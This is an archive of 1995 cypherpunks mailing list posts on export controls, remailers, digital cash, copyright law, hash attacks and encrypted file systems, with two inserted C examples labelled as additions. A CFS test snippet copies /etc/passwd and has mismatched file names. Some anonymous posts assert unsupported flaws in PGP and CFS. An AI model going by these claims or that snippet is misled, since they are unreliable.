From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 28 Oct 1995 07:38:28 +0800
To: cypherpunks@toad.com
Subject: DigiCrime web page
Message-ID: <199510272320.XAA29752@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Arjen Lenstra's startup, DigiCrime, full service criminal computer
hacking organization now has a web presence, thanks to the efforts
of its thief scientist, Kevin McCurley.

http://www.digicrime.com/

-matt blaze, president of vice





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@atlas.ex.ac.uk
Date: Sat, 28 Oct 1995 04:23:21 +0800
To: stripes@va.pubnix.com
Subject: Re: CJR returned to sender
Message-ID: <10401.9510271935@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Josh Osborne <stripes@va.pubnix.com> writes on cpunks:
> [...]
> 
> (Also we may find a better quality shirt printer and actually be
> able to print readably not only CODE128 barcodes, but some of the
> more advanced encoding methods that store as much as 40K a page...
> how big is the PGP source?)

Well the DOS PGP.EXE binary should do (no need for source, as it
uses keysizes greater than allowed by ITAR already, so ability to
increase key sizes is not required for ITAR applicability).  It's 94k
pkzipped.  Front and back print on a T-shirt would give you 80k.  You
could probably tweak something to get it on a shirt.  Dunno if it
would read printed on a shirt.

It would be fun to see what it looked like on a sheet of paper tho'.

Anyone happen to have code to do some of these 2d barcoding things?
Or are they all proprietary?

> >If the CJR for the t-shirt is ultimately denied, ditto?
> 
> That would be much better.  More free publicity.  An example of how
> impossible it is to enforce the ITAR that anyone should be able to
> understand.

Yeah, I think that would be good anti-ITAR publicity.

> >The t-shirt joke is unlikely to help. (For all those who commented that
> >wearing the munitions shirt is rilly, rilly kool, I say "Great!" Wear it in
> >the mosh pits, just lie to people about how the t-shirt "has been
> >classified as a munition." It hasn't been as of this writing.)
> 
> [...]
> 
> (and yeah it is a shame the shirt actually says "has been classified",
> I had thought I said "qualifies as a" which would have been correct -
> but that may just be my revisionist memory kicking in)

The wording on the shirts is: "...is a munition" and "...is
classified as a munition".  Is that what you meant, that "this shirt is
a munition" is misleading?

The "has been classified" was wording that Don Henson used in his
earlier ads, but did not appear on any of the shirts (AFAIK).

Joel Furr's shirt says:

 THIS SHIRT IS A MUNITION


Don Henson's says:

     WARNING
    THIS SHIRT 
       IS A 
     MUNITION 


My shirts say:

                WARNING
THIS SHIRT IS CLASSIFIED AS A MUNITION AND
   MAY NOT BE EXPORTED FROM THE UNITED
  STATES, OR SHOWN TO A FOREIGN NATIONAL


I think Raph sent them one of Joel's, so it says "this shirt is a
munition", rather than "...has been classified...".  Perhaps some
people think that this too is inaccurate?

Adam
--
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)

Munitions T-shirts: http://www.obscura.com/~shirt/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 28 Oct 1995 16:00:11 +0800
To: cypherpunks@toad.com
Subject: SSL Remailer interface w/premail
Message-ID: <199510280713.AAA18017@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


https://www.c2.org/remail/by-www.html

	Note that this uses SSL and that messages are encrypted using
premail -- the entire remailing chain is not in the clear
anymore. This is still a single point of failure system, but secure
against attacks which do not involve the compromise of c2.org. (Unlike
the non-encrypting one on http://www.c2.org/remail/by-www.html)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@cygnus.com>
Date: Sun, 29 Oct 1995 13:09:29 +0800
To: Alan Patterson <khijol!tanju.wsnet.com!lep@cygnus.com>
Subject: Re: Need Mail-to-News gates
In-Reply-To: <Pine.LNX.3.91.951027175407.19464A-100000@tanju.wsnet.com>
Message-ID: <Pine.3.89.9510280101.A1036-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Oct 1995, Alan Patterson wrote:

> On Fri, 27 Oct 1995 bluebird@alpha.c2.org wrote:
> 
> > Could someone PLEASE netmail me some _known reliable_ gates that use the
> > straight netmail address format (alt.whatnot@bosco.kollege.edu)?
> 
> If someone will direct me to sources, I'll try and setup a gate. (We use 
> INN).

Why not take the easy way out - set up an alias in /usr/lib/aliases to 
run inews on the incoming email?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Date: Sun, 29 Oct 1995 13:01:14 +0800
To: cypherpunks@toad.com
Subject: 1995-10-27 Members Named to Nat Security Telecom Committee (fwd)
Message-ID: <Pine.3.89.9510280157.B1036-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


---------- Forwarded message ----------
Date: Fri, 27 Oct 1995 20:11-0400
From: The White House <Publications-Admin@WhiteHouse.Gov>
To: Public-Distribution@clinton.ai.mit.edu
Subject: 1995-10-27 Members Named to Nat Security Telecom Committee





                            THE WHITE HOUSE

                     Office of the Press Secretary

________________________________________________________________________
For Immediate Release                                   October 27, 1995


	     PRESIDENT NAMES MEMBERS TO THE NATIONAL SECURITY 
	       TELECOMMUNICATIONS ADVISORY COMMITTEE (NSTAC) 

     President Clinton today announced his intent to appoint the following
individuals to the National Security Telecommunications Advisory Committee
(NSTAC):

     Dr. Vance D. Coffman is the president of Lockheed Martin Corporation.
Previously, he was president of the Space Systems Division of Lockheed
Missiles and Space Co. and vice president of the corporation.  Dr. Coffman
was responsible for the Hubble Space Telescope, MILSTAR, Follow-on Early
Warning, and the worldwide mobile commercial cellular phone system,
Iridium.  He holds a B.S. degree in aerospace engineering from Iowa State
University, and masters and doctoral degrees in aeronautics and
astronautics from Stanford University.

     Mr. Paul E. Wright is chairman of Chrysler Technologies Corporation
(CTC), the aerospace and defense electronics arm of the Chrysler
Corporation.  He was president and chief operating officer of Fairchild
Industries prior to joining CTC.  Mr. Wright guided the company's focus
toward spacecraft, defense electronics, and selected industrial products.
Mr. Wright spent 28 years with RCA Corporation, during which time he rose
to senior vice president.  He was responsible for developing and
administrating the strategic plans for RCA.

     Van B. Honeycutt is president of Computer Sciences Corporation (CSC),
the largest independent provider of information technology consulting,
systems integration, and outsourcing to industry and government.  He began
his career with CSC in 1975, serving as a regional marketing manager for
Infonet, the company's timesharing and value-added network, which CSC sold
in 1989.  In 1983, Mr. Honeycutt became president of CSC Credit Services.
He was later promoted to corporate vice president and president of CSC's
Industry Services Group in 1987.  He led CSC's advance into the growing
outsourcing market, negotiating the industry's largest outsourcing pact, a
10 year, $3 billion agreement with General Dynamics Corporation.

     The President's National Security Telecommunications Advisory
Committee (NSTAC) provides the President with information and advice from
the industry's perspective regarding specific measures to maintain,
protect, and enhance the nation's telecommunications resources that
support national security and emergency preparedness capabilities.  The
Committee addresses telecommunications issues throughout the year and
periodically reports directly to the President, and also to the Secretary
of Defense in his capacity as the Executive Agent for the National
Communications System.


-30-30-30-












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: someone <zxmjn11@here.or.there>
Date: Sat, 28 Oct 1995 09:47:24 +0800
To: cypherpunks@toad.com
Subject: Re: Encrypted TCP Tunneler
In-Reply-To: <Pine.SUN.3.91.951023022123.9641C-100000@eskimo.com>
Message-ID: <Pine.HPP.3.91.951028021729.17430B-100000@hp24.zdv.uni-tuebingen.de>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I am using a prog called twinsock to have an internet connection via my 
shell account. The program provides a winsock for my windows progs and it 
comes with the complete source. When I first started to use it, I thought 
that it must be fairly easy to add some packet encryption to this 
program. But then I realized that it wouldn't work over a tcp/ip 
connection, only over a telephone line. But maybe the twinsock code might 
be a good starting point for some encrypting winsock. Unfortunately, I am 
not a good enough programmer to estimate how much work it is to come up 
with such an enhanced winsock or even start to make one myself.

Stephan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "User A." <usura@utopia.hacktic.nl>
Date: Sat, 28 Oct 1995 10:09:18 +0800
To: cypherpunks@toad.com
Subject: Re: Need Mail-to-News gates
Message-ID: <199510280149.CAA06177@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


You sez:
: On Fri, 27 Oct 1995 bluebird@alpha.c2.org wrote:

: > Could someone PLEASE netmail me some _known reliable_ gates that use the
: > straight netmail address format (alt.whatnot@bosco.kollege.edu)?

: If someone will direct me to sources, I'll try and setup a gate. (We use 
: INN).

'ftp.hacktic.nl/pub/replay/remailer/mail2news.shar

-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@alpha.c2.org (Anonymous)
Date: Sat, 28 Oct 1995 21:15:38 +0800
To: cypherpunks@toad.com
Subject: Re: Diffie-Hellman Key Generation
In-Reply-To: <Pine.3.89.9510271616.A410-0100000@unicorn.com>
Message-ID: <199510281301.GAA12933@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Finally, I'm basing this on comments in 'Applied Cryptography' that D-H
> keys should be at least 512 bits and preferably 1024. How does the
> difficulty of breaking a D-H exchange with a 512 bit key compare to
> breaking a 512 bit RSA key ?

Calculating discrete logarithms is a bit more difficult than factoring.
So a 512-bit DH modulus will give you somewhat more security than a 512-bit
RSA key.  I'm not sure how much, probably not a lot.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 29 Oct 1995 02:05:55 +0800
To: cman@communities.com (Douglas Barnes)
Subject: Re: newsweek oct 30 Levy digital cash article
In-Reply-To: <v02120d08acb716a45144@[199.2.22.120]>
Message-ID: <199510281748.KAA11693@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>
>>you apparently didn't notice but there were some other posts on this
>>list about writing down the random seed that a person used to generate
>>the cash, and then being able to restore the cash somehow based on knowing
>>the random seed, however privacy is sacrificed in this case apparently.
>>this with the Chaumian implementation, from what I understood.
>>
>
>I would not say that privacy is "sacrificed" if, in fact, Digicash
>has implemented this "write down the original random seed" backup
>method. Worst case scenario -- you write down the seed, and when the
>police break down your door, they find that you've written it down.

point well taken, but I thought the original poster stated that one
had to reveal the blinding factors to the bank, which I interpreted
as "sacrificing" anonymity.

frankly, I didn't understand that whole procedure and that's why I
asked someone to go into detail about this very important aspect
of the cash beyond the 3 liners or so I have seen.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Sun, 29 Oct 1995 02:23:10 +0800
To: BELL@odo.law.udayton.edu (Tom Bell)
Subject: Re: S. 1284 To Amend (C) Act
In-Reply-To: <14ADF0902256@odo.law.udayton.edu>
Message-ID: <199510281800.LAA07028@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> The 9/28/95 Congressional Report states that Senators Hatch and Leahy
> have introduced a bill to amend the Copyright Act in accord with the
> suggestions of the recent White Paper on the National Information
> Infrastructure.  In relevant part, S. 1284: 1) makes transmission of
> copies a type of publication (and thus potentially a means of
> infringing a copyright); and 2) prohibits the importation,
> manufacture, or distribution of any device the primary purpose of
> which is to deactivate any technological protections that prevent or
> inhibit the violation of copyrights.
> 
> Though I can imagine cypherpunks objecting to the first of these two 
> provisions, I'm especially interested in how you regard the 
> second.

It's a mad mad mad mad mad world. I'd better order my cable descrambler
ahead of time.

Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 29 Oct 1995 02:26:39 +0800
To: Paul Koning               1695 <pkoning@chipcom.com>
Subject: Re: Linux security issues
Message-ID: <199510281804.LAA14320@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Actually keeping the pass phrase out of swap space is fairly easy (although
>>I haven't looked at the PGP code to see if it actually does this).
>>...
>>However, the pass phrase is not the only dangerous information.
>>...
>>N.B. This problem affects all virtual memory operation systems.
>
>Not all of them.  In at least one (VMS) you can pin pages in physical 
>memory,

Good point.  Too bad the invocations of pinning aren't portable.  Maybe in
the next POSIX.

>Actually, any OS that does I/O directly to user pages has that capability in 
>the kernel...

All the OSs I am familiar with pin the pages only for the duration of the
I/O operation.  After the I/O has completed, the page can be swapped out. 
What you really need is to pin the page in memory (with an implicit
contract with your OS that it won't be written to swap space while it is
pinned), put the sensitive information in the page, use the information,
wipe the information, and un-pin the page.

I wonder if NSA has built a virus to collect PGP keys?

Bill
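
[Added example, not part of the original message and not PGP's code: the pin, put, use, wipe, un-pin sequence described above, written with POSIX mlock()/munlock(). The names secret_region, secret_open, secret_wipe, secret_is_clear, secret_close and checksum_in_pinned_page, and the byte sum standing in for real key handling, are assumptions made for this illustration.]

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE              /* glibc: expose MAP_ANONYMOUS */
#endif
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Hypothetical helper type for this example: one pinned secret area. */
typedef struct {
    unsigned char *buf;   /* page-aligned private anonymous mapping */
    size_t len;           /* mapping length, always whole pages */
    int locked;           /* 1 if mlock() pinned the pages */
} secret_region;

/* Map whole pages and pin them. With require_lock set this fails closed
 * when the pages cannot be pinned (for example RLIMIT_MEMLOCK too low). */
int secret_open(secret_region *r, size_t want, int require_lock)
{
    long page = sysconf(_SC_PAGESIZE);
    void *p;

    r->buf = NULL; r->len = 0; r->locked = 0;
    if (page <= 0 || want == 0) return -1;
    r->len = (want + (size_t)page - 1) / (size_t)page * (size_t)page;
    p = mmap(NULL, r->len, PROT_READ | PROT_WRITE,
             MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) { r->len = 0; return -1; }
    r->buf = p;
    r->locked = (mlock(r->buf, r->len) == 0);
    if (!r->locked && require_lock) {
        munmap(r->buf, r->len);
        r->buf = NULL; r->len = 0;
        return -1;
    }
    return 0;
}

/* Zero the region through a volatile pointer so the compiler cannot
 * drop the stores as dead writes before the unmap. */
void secret_wipe(secret_region *r)
{
    volatile unsigned char *p = r->buf;
    for (size_t i = 0; i < r->len; i++) p[i] = 0;
}

/* Returns 1 when every byte of the region is zero. */
int secret_is_clear(const secret_region *r)
{
    for (size_t i = 0; i < r->len; i++)
        if (r->buf[i] != 0) return 0;
    return 1;
}

/* Wipe first, then un-pin, then unmap: the page is never swappable
 * while it still holds the secret. */
void secret_close(secret_region *r)
{
    if (r->buf == NULL) return;
    secret_wipe(r);
    if (r->locked) munlock(r->buf, r->len);
    munmap(r->buf, r->len);
    r->buf = NULL; r->len = 0; r->locked = 0;
}

/* Pin, put, use, wipe, un-pin. The byte sum stands in for real key use. */
int checksum_in_pinned_page(const char *secret, int require_lock,
                            unsigned long *sum_out)
{
    secret_region r;
    size_t n = strlen(secret);
    unsigned long sum = 0;

    if (secret_open(&r, n + 1, require_lock) != 0) return -1;
    memcpy(r.buf, secret, n + 1);                      /* put  */
    for (size_t i = 0; i < n; i++) sum += r.buf[i];    /* use  */
    secret_close(&r);                                  /* wipe + un-pin */
    *sum_out = sum;
    return 0;
}

int main(void)
{
    unsigned long sum = 0;
    /* "abc" is a constructed stand-in for a pass phrase. */
    if (checksum_in_pinned_page("abc", 1, &sum) != 0) {
        fprintf(stderr, "could not pin memory; refusing to handle the secret\n");
        return 1;
    }
    printf("byte sum computed inside the pinned page: %lu\n", sum);
    return 0;
}
```

mlock() does not stop suspend-to-disk from writing RAM out, and copies of the secret left in other buffers (terminal input, stdio, the caller's own string) are not covered by the pinned page.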






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tom Bell" <BELL@odo.law.udayton.edu>
Date: Sat, 28 Oct 1995 23:58:08 +0800
To: cypherpunks@toad.com
Subject: S. 1284 To Amend (C) Act
Message-ID: <14ADF0902256@odo.law.udayton.edu>
MIME-Version: 1.0
Content-Type: text/plain


The 9/28/95 Congressional Report states that Senators Hatch and Leahy 
have introduced a bill to amend the Copyright Act in accord with the 
suggestions of the recent White Paper on the National Information 
Infrastructure.  In relevant part, S. 1284:  1) makes transmission of copies a 
type of publication (and thus potentially a means of infringing a 
copyright); and 2) prohibits the importation, manufacture, or 
distribution of any device the primary purpose of which is to 
deactivate any technological protections that prevent or inhibit the 
violation of copyrights.

Though I can imagine cypherpunks objecting to the first of these two 
provisions, I'm especially interested in how you regard the 
second.  Imagine that Microsoft devised a program to prevent 
unauthorized copying of its software, and that you (perhaps in 
response to another of Sameer's contests!) wrote a program to 
counteract it.  It looks as if the proposed law would forbid your 
counter-programming.  Bob would thus find it easier to sell defective 
copyright protection devices.

I'm thinking of writing an article about the White Paper and S. 1284, 
arguing that cypherpunks render a valuable public service in finding 
gaps in copyright protection, and that they therefore ought not be 
forbidden from pursuing their research.  I invite you to email me privately if 
you have a strong opinion about the proposed changes to the Copyright 
Act. I've attached a copy of the proposed s1201 below.

In a related vein, Senators Leahy and Feingold have introduced S. 
1122, which criminalizes willful infringements that do not have the
purpose of commercial gain.  This aims to close a perceived loophole 
under the current law, by which LaMacchia was able to distribute
copyrighted works.

S. 1284,  s1201:  "No person shall import, manufacture or distribute 
any device, product, or component incorporated into a device or 
product, or offer or perform any service, the primary purpose or 
effect of which is to avoid, bypass, remove, deactivate, or otherwise 
circumvent, without the authority of the copyright owner or the law, 
any process, treatment, mechanism or system which prevents or 
inhibits the violation of any of the exclusive rights of the 
copyright owner under section 106."

Tom W. Bell
Assistant Professor 
Law and Technology Program
UD Law School
bell@odo.law.udayton.edu

PGP fingerprint:
78 06 76 AC 32 38 A6 4C  B3 81 F4 1E 2E 27 AC 71





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Oct 1995 03:15:32 +0800
To: tomw@cthulhu.engr.sgi.com
Subject: Re: 50 attacks... [NOISE]
Message-ID: <199510281848.LAA04943@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:31 AM 10/20/95 -0700, tomw@engr.sgi.com wrote:
>To date, MD5 appears to be a secure hash.  If you manage to find a way
>to reverse it, please let us all know.

There are a couple of analytically known collisions, and a birthday attack
can generate more after a mere 2**64 tries or so; for some applications, 
this can be a problem (e.g. if a collision between real input and
random-trash input can let you get the system to do something unexpected
by handing it the random-trash input.)

Also, you can easily MD5-hash a dictionary of a billion wimpy passphrases
to let you catch people who use wimpy passphrases, and similarly hash
a dictionary of a billion reasonably-probable plaintexts for applications
that have reasonably-probable plaintexts that leave the hashes in plain view
(e.g. checksums for messages like "send $X to account Y"); this kind of
attack works for any hash, including cryptographically strong hashes,
as long as the system being attacked lets you crack it by reversing a hash
and doesn't use salt in its hashes.


>Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
>we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com

But Washington not doing anything is *good* :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Oct 1995 03:15:19 +0800
To: tomw@cthulhu.engr.sgi.com
Subject: Re: digital cash and identity disclosure
Message-ID: <199510281848.LAA05019@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:53 AM 10/20/95 -0700, tomw@cthulhu.engr.sgi.com wrote:
>> I don't understand how this could happen? The two coins are identical
>> (as I understood it from the tech background of ecash). What does a double-
>> spent coin have that a copied single-spent coin does not?

>The process of spending a coin is not simply that of transferring data.
>There is a complicated protocol in which Alice decrypts some of the
>identity information in the coin.  

There are several approaches - in the immediate-clearing model,
you can tell if someone's spent coin 111111111111 because the bank keeps
a record of which coins have been spent and refuses to pay anybody
who tries to spend the same coin later; this almost forces you to use
on-line clearing solutions.  Chaum's blinding protocols
make it possible for the bank to sign a coin without being able to
trace it to the person withdrawing the coin, so she can spend it anonymously.

Another model uses the protocols Tom described which place a random chunk
of the spender's identity into the coin - one chunk gives away no information,
but two chunks have an extremely high probability of doing so - so you
can go prosecute the guilty double-spender later (or just debit her account
twice...)
Then there are the non-anonymous models.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
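
[Added example, not part of the original message and not DigiCash's code: a simplified sketch of the identity-splitting model described above, where each spend reveals one half of every (left, right) pair and left XOR right is the spender's identity. Blinding, the bank's signature and the commitments that bind the spender to each half are omitted; K, the struct and function names, the toy PRNG and the account number 0x00C0FFEE are constructed for this illustration.]

```c
#include <stdint.h>
#include <stdio.h>

#define K 16   /* identity pairs per coin; also the challenge width in bits */

/* Kept by the spender: left[i] ^ right[i] == identity for every i. */
typedef struct { uint32_t left[K], right[K]; } coin_secret;

/* What a merchant sees in one spend and later deposits at the bank. */
typedef struct { uint16_t challenge; uint32_t reveal[K]; } spend_record;

/* Toy xorshift generator so the example is reproducible.
 * NOT cryptographic; a real wallet needs a CSPRNG here. */
static uint32_t prng_state = 0x2545F491u;
static uint32_t toy_rand(void)
{
    prng_state ^= prng_state << 13;
    prng_state ^= prng_state >> 17;
    prng_state ^= prng_state << 5;
    return prng_state;
}

/* Withdrawal: split the identity into K random XOR shares. Either half
 * of a pair on its own is a uniformly random word. */
void coin_make(coin_secret *c, uint32_t identity)
{
    for (int i = 0; i < K; i++) {
        c->left[i]  = toy_rand();
        c->right[i] = c->left[i] ^ identity;
    }
}

/* Spend: the merchant picks the challenge; bit i selects which half of
 * pair i the spender has to reveal. */
void coin_spend(const coin_secret *c, uint16_t challenge, spend_record *out)
{
    out->challenge = challenge;
    for (int i = 0; i < K; i++)
        out->reveal[i] = ((challenge >> i) & 1) ? c->right[i] : c->left[i];
}

/* Bank: given two deposits of the same coin, look for a pair where the
 * challenges differ. Both halves are then known and their XOR is the
 * identity. Returns 1 and sets *id_out on success, 0 if the two records
 * answer the same challenge (a copied transcript reveals nothing new). */
int bank_unmask(const spend_record *a, const spend_record *b, uint32_t *id_out)
{
    uint16_t diff = (uint16_t)(a->challenge ^ b->challenge);
    for (int i = 0; i < K; i++) {
        if ((diff >> i) & 1) {
            *id_out = a->reveal[i] ^ b->reveal[i];
            return 1;
        }
    }
    return 0;
}

int main(void)
{
    coin_secret coin;
    spend_record shop1, shop2, replay;
    uint32_t id = 0;

    coin_make(&coin, 0x00C0FFEEu);          /* constructed account number */
    coin_spend(&coin, 0x0F0F, &shop1);      /* first merchant's challenge */
    coin_spend(&coin, 0x0F1F, &shop2);      /* second merchant, differs in bit 4 */
    coin_spend(&coin, 0x0F0F, &replay);     /* same challenge as shop1 */

    if (bank_unmask(&shop1, &shop2, &id))
        printf("double spend: identity 0x%08X\n", (unsigned)id);
    if (!bank_unmask(&shop1, &replay, &id))
        printf("identical transcripts: nothing revealed\n");
    return 0;
}
```

With independent random K-bit challenges, two spends escape unmasking only when the challenges are identical, which happens with probability 2^-K.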





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moroni <moroni@prufrocks.scranton.com>
Date: Sun, 29 Oct 1995 00:14:01 +0800
To: cypherpunks@toad.com
Subject: Returned mail: warning: cannot send message for 4 hours (fwd)
Message-ID: <Pine.LNX.3.91.951028115811.1708A-110000@prufrocks.scranton.com>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Fri, 27 Oct 1995 19:45:02 -0400
From: Mail Delivery Subsystem <MAILER-DAEMON@prufrocks.scranton.com>
To: moroni@prufrocks.scranton.com
Subject: Returned mail: warning: cannot send message for 4 hours

    **********************************************
    **      THIS IS A WARNING MESSAGE ONLY      **
    **  YOU DO NOT NEED TO RESEND YOUR MESSAGE  **
    **********************************************

The original message was received at Fri, 27 Oct 1995 15:38:29 -0400
from moroni@localhost

   ----- The following addresses had delivery problems -----
majordormo@toad.com.uc.edu  (transient failure)

   ----- Transcript of session follows -----
Warning: message still undelivered after 4 hours
Will keep trying until message is 5 days old

   ----- Original message follows -----


To: majordormo@toad.com.uc.edu
From: Moroni <moroni@prufrocks.scranton.com>
Date: Fri, 27 Oct 1995 15:38:27 -0400 (EDT)

subscribe Cypherpunks Deirdre A. Greene





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sun, 29 Oct 1995 05:19:34 +0800
To: cypherpunks@toad.com
Subject: Re: Electric Communities (was: COS_sec)
Message-ID: <199510282005.NAA25047@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d04acb6f56280f0@[199.2.22.120]>
cman@communities.com (Douglas Barnes) wrote:
>
>FWIW, this is the company I work for. Not a bad article; more
>info is available at: http://www.communities.com/. Three of
>the nine people who work here are long-time subscribers to this
>list... I was recruited at a c'punks Bay Area meeting.
>
>--doug "member of the cryptographic staff" barnes
>
>>      Electric Communities began work in 1993 on the
>>      Cyberspace Operating System, or COS, designed to manage
>>      the resources of shared computing -- like security and
>>      bandwidth -- just as operating systems like the
>>      Macintosh OS or Windows 95 manage resources inside a
>>      desktop PC. The team is inventing some technology,
>>      including a programming language (compatible with Sun
>>      Microsystems' new Java language for Internet
>>      applications) and a design concept for software building
>>      blocks which it is in the process of patenting. In
>>      addition, staff cryptographers are weaving encryption
>>      throughout the system to make it absolutely secure and
>>      private.
>>
>>
>>   COS_sec  (6 kb)
>
>

Great! Just what we need! Java wannabes!

Ripoffs of second-rate, insecure software by third-rate people!

Hey Dougie, "invented" any viruses lately?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sun, 29 Oct 1995 05:31:02 +0800
To: cypherpunks@toad.com
Subject: Re: New release of CFS Unix encrypting file system available
Message-ID: <199510282012.NAA25761@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199510271954.PAA20647@universe.digex.net>
Scott Brickner <sjb@universe.digex.net> wrote:
>Matt Blaze writes:
>>CFS pushes encryption services into the Unix(tm) file system.  It
>>supports secure storage at the system level through a standard Unix
>>file system interface to encrypted files.  Users associate a
>>cryptographic key with the directories they wish to protect.  Files in
>>these directories (as well as their pathname components) are
>>transparently encrypted and decrypted with the specified key without
>>further user intervention; cleartext is never stored on a disk or sent
>>to a remote file server.  CFS employs a novel combination of DES
>>stream and codebook cipher modes to provide high security with good
>>performance on a modern workstation.  CFS can use any available file
>>system for its underlying storage without modification, including
>>remote file servers such as NFS.  System management functions, such as
>>file backup, work in a normal manner and without knowledge of the key.
>
>What happens to hard links?
>
>mkdir foo bar
>CFS_set_directory_key -directory ./foo -key foo-key
>CFS_set_directory_key -directory ./bar -key bar-key
>cp /etc/passwd ./foo/test1
>ln ./foo/footest ./bar/bartest
>cmp ./foo/footest ./bar/bartest

This is a serious flaw. The emperor has no clothes. People should
sue at&t for this shit.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sun, 29 Oct 1995 05:50:18 +0800
To: cypherpunks@toad.com
Subject: Re: CJR returned to sender
Message-ID: <199510282012.NAA25772@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <>
bal@martigny.ai.mit.edu wrote:
>   Date: Wed, 25 Oct 1995 09:08:15 -0700
>   X-Sender: tcmay@mail.got.net
>   Mime-Version: 1.0
>   Content-Type: text/plain; charset="us-ascii"
>   From: tcmay@got.net (Timothy C. May)
>   Sender: owner-cypherpunks@toad.com
>   Precedence: bulk
>
>   At 6:35 AM 10/25/95, Timothy C. May wrote:
>   >
>   >(* Hal Abelson of MIT says there are possible export problems with the MIT
>   >Press book on PGP, and MIT dropped plans for a version in a special OCR
>   >font. So, I agree that _some_ books cross the line and look like pure
>   >software. However, I continue to maintain that a badly-printed barcode is
>   >just a joke, nothing more.)
>
>   Brian LaMacchia sent me e-mail saying the MIT book _was_ published with the
>   OCR font as originally planned. No response to their CJR request, submitted
>   in Jan or Feb.
>
>[Blatant plug for MIT Press...]
>
>For reference, the title of the book is "PGP: Source Code and
>Internals", ISBN 0-262-24039-4, hardcover, $60.00.  There are links to
>the MIT Press pages from my keyserver home page
>(http://www-swiss.ai.mit.edu/~bal/keyserver.html), or you can go to MIT
>Press's site (http://www-mitpress.mit.edu/) and look under
>Books/Computer Science.  Orders accepted over the net using either HTML
>forms (SSL) or e-mail (PGP).
>
>MIT Press is also selling "MIT PGP" T-Shirts, but I don't have pricing
>or size information on them yet.  They have the logo from the book cover
>on the front & back.  Front says "Mind your own business," back has a
>copy of MIT Press's PGP public key (in ASCII-armored form).
>
>					--bal

It's worth 60 bucks because the book has the old version without the
weakness in it. They are probably assuming that people will look at the
book instead of the ftp source code and then get lazy and compile the
code off the ftp instead of typing or scanning the book.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pierre Uszynski <pierre@shell.portal.com>
Date: Sun, 29 Oct 1995 05:17:32 +0800
